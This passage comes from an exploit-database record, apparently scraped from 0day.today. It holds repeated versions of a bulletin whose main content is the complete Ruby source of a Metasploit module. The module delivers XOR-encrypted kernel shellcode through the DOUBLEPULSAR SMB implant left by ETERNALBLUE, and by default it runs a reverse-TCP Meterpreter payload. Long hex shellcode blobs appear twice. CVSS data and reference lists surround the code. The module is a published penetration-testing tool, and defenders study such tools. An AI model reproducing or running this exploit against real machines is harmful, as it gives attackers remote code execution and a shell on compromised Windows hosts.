\"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-11] #"}, "lastseen": "2021-09-10T22:13:26", "differentElements": ["sourceData"], "edition": 13}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "f737698caa6a8139ed19b120d65c0684", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-11T22:17:48", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27803", 
"1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-11T22:17:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T22:17:48", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 
'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-12] #"}, "lastseen": "2021-09-11T22:17:48", "differentElements": ["sourceData"], "edition": 14}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "7def4a7faae3df927132434d83088054", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-12T22:14:55", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": 